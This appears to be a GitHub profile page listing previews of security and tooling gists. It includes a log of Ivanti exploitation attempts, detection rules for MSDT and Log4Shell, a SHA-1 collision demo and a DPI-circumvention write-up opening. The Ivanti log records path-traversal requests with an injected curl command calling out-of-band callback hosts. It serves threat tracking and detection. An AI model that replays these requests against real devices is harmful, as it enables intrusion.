Skip to content

Instantly share code, notes, and snippets.

View adulau's full-sized avatar
👨‍💻
Doing stuff

Alexandre Dulaunoy adulau

👨‍💻
Doing stuff
View GitHub Profile
@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
AWS Prowler Scan
AWS Scout2 Scan
AWS Security Finding Format (ASFF) Scan
AWS Security Hub Scan
Acunetix Scan
Acunetix360 Scan
Anchore Engine Scan
Anchore Enterprise Policy Check
Anchore Grype
AnchoreCTL Policies Report
@rain-1
rain-1 / llama-home.md
Last active November 9, 2024 03:49
How to run Llama 13B with a 6GB graphics card

This worked on 14/May/23. The instructions will probably require updating in the future.

llama is a text prediction model similar to GPT-2, and the version of GPT-3 that has not been fine tuned yet. It is also possible to run fine tuned versions (like alpaca or vicuna with this. I think. Those versions are more focused on answering questions)

Note: I have been told that this does not support multiple GPUs. It can only use a single GPU.

It is possible to run LLama 13B with a 6GB graphics card now! (e.g. a RTX 2060). Thanks to the amazing work involved in llama.cpp. The latest change is CUDA/cuBLAS which allows you pick an arbitrary number of the transformer layers to be run on the GPU. This is perfect for low VRAM.

  • Clone llama.cpp from git, I am on commit 08737ef720f0510c7ec2aa84d7f70c691073c35d.

FIRST mermaid graph

Keeping in mind the "Latency Numbers Every Programmer Should Know", i.e. network access is expensive.

Online request (service is provided by hashlookup online API)

  • existing / not existing have the same high cost
  • network access takes a long time
  • leak every hash to hashlookup service
@kevthehermit
kevthehermit / detection.yml
Last active September 16, 2022 22:55
Office --> MSDT --> RCE
title: Sysmon Office MSDT
id: c95ed569-5da4-48b3-9698-5e429964556c
description: Detects MSDT Exploit Attempts
status: experimental
author: kevthehermit
date: 2022/05/30
references:
- https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
- https://gist.github.com/kevthehermit/5c8d52af388989cfa0ea38feace977f2
logsource:
@Sc00bz
Sc00bz / collision.php
Created March 17, 2022 16:09
HMAC-SHA1 Collision
<?php
// Collision taken from https://shattered.io/
// Outputs:
// HMAC-SHA1(key, msg1): 9b4dee1a35fc03786f1162989d1e441ba0e69f4d
// HMAC-SHA1(key, msg2): 9b4dee1a35fc03786f1162989d1e441ba0e69f4d
//
// HMAC-SHA256(key, msg1): e98a27bd93001cda9810b93c2191f5099817bb31f5445bc12cafd27a78cb4506
// HMAC-SHA256(key, msg2): 97aa871b175a99417f7f1c44ac2793730821caf7da697ff374c60f595ef5173a
@gmurdocca
gmurdocca / socat_caesar_dpi.md
Last active June 28, 2024 15:53
Circumventing Deep Packet Inspection with Socat and rot13

Circumventing Deep Packet Inspection with Socat and rot13

I have a Linux virtual machine inside a customer's private network. For security, this VM is reachable only via VPN + Citrix + Windows + a Windows SSH client (eg PuTTY). I am tasked to ensure this Citrix design is secure, and users can not access their Linux VM's or other resources on the internal private network in any way outside of using Citrix.

The VM can access the internet. This task should be easy. The VM's internet gateway allows it to connect anywhere on the internet to TCP ports 80, 443, and 8090 only. Connecting to an internet bastion box on one of these ports works and I can send and receive clear text data using netcat. I plan to use good old SSH, listening on tcp/8090 on the bastion, with a reverse port forward configured to expose sshd on the VM to the public, to show their Citrix gateway can be circumvented.

Rejected by Deep Packet Inspection

I hit an immediate snag. The moment I try to establish an SSH or SSL connection over o

@adulau
adulau / tor2web-list.md
Last active November 10, 2024 02:56
Tor2web and tor proxies public list

Tor2web and tor proxies public list

List of services which are giving access to Tor network and especially Tor hidden services via web interface. We keep track of potential injection or abuse from such service (the column Scam).

List

Url Status Domain Log Techno Scam
https://onion.re/ UP onion.re full custom no
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active November 8, 2024 17:29
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@Neo23x0
Neo23x0 / log4j_rce_detection.md
Last active September 11, 2024 21:41
Log4j RCE CVE-2021-44228 Exploitation Detection

log4j RCE Exploitation Detection

You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in folder /var/log and all sub folders

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log